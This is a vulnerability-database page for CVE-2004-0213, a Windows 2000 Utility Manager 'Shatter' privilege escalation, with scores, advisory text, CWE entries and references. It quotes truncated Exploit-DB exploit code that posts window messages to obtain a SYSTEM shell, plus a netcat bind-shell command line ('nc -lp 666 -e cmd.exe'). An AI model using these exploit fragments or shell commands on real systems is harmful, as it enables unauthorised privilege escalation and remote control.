CVE-2004-0213
Published 2004-08-06
Priority: P3, score 38 (high); CVSS 3.1 base score 7.8
CVSS 3.1 vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 21.26% (97.3rd percentile)
Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908.
CVSS provenance
NVD, CVSS v3.1: 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
NVD, CVSS v2.0: 7.2 HIGH (AV:L/AC:L/Au:N/C:C/I:C/A:C)
GHSA
GHSA-wwxr-4g98-3vf6 (CVE-2003-0908) [HIGH]: The Utility Manager in Microsoft Windows 2000 executes winhlp32
ghsa_unreviewed · 2022-04-29 · CVSS 7.8
The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213.
GHSA
GHSA-62vf-wrg7-5x68 (CVE-2004-0213) [HIGH] CWE-306: Utility Manager in Windows 2000 launches winhlp32
ghsa_unreviewed · 2022-04-29 · CVSS 7.2
Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
exploitdb · 2004-07-20 · CVE-2004-0213
---
/******************************************************************************************
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** v2.666: added autonomous (allinone) remote exploitation system ;) **
** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a **
** normal user account). Must be called with an argument (any argument) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4***
Exploit-DB
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
exploitdb · 2004-07-17 · CVE-2004-0213
---
/******************************************************************************************
****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4*****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec at yahoo.com
#include
struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[]
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb · 2004-07-17 · CVE-2004-0213
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
exploitdb · 2004-07-14 · CVE-2004-0213
---
//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of privileges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";
// run utility manager
// system("utilman.exe /start");
// Sleep(500);
lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe\n");
return 0;
}
PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button in the taskbar o
No writeups or analysis indexed.
CWE
CWE-360: Trust of System Event Data [HIGH]
mitre_cwe · CVSS 7.2
Security based on event locations is insecure and can be spoofed.
Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Common Consequences:
Scope: Integrity, Confidentiality, Availability, Access Control. Impact: Gain
CWE
CWE-271: Privilege Dropping / Lowering Errors
mitre_cwe
The product does not drop privileges before passing control of a resource to an actor that does not have those privileges.
In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Operation
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity. If privileges are not dropped, neither are access rights of the user. Often these righ
CWE
CWE-306: Missing Authentication for Critical Function
mitre_cwe
The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
Modes of Introduction:
Phase: Architecture and Design
Note: OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.
Phase: Architecture and Design
Note: Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will conne
CWE
CWE-422: Unprotected Windows Messaging Channel ('Shatter') [MEDIUM]
mitre_cwe · CVSS 4.6
The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.
Modes of Introduction:
Phase: Architecture and Design
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity, Bypass Protection Mechanism.
Potential Mitigations:
[Architecture and Design] Always verify and authenticate the source of the message.
Observed Examples:
CVE-2002-0971: Bypass GUI and access restricted dialog box.
CVE-2002-1230: Gain privileges via Windows message.
CVE-2003-0350: A control allows a change to a pointer for a callback function using Windows mess
References
http://marc.info/?l=bugtraq&m=108975382413405&w=2
http://www.kb.cert.org/vuls/id/868580
http://www.us-cert.gov/cas/techalerts/TA04-196A.html
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-019
https://exchange.xforce.ibmcloud.com/vulnerabilities/16592
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2495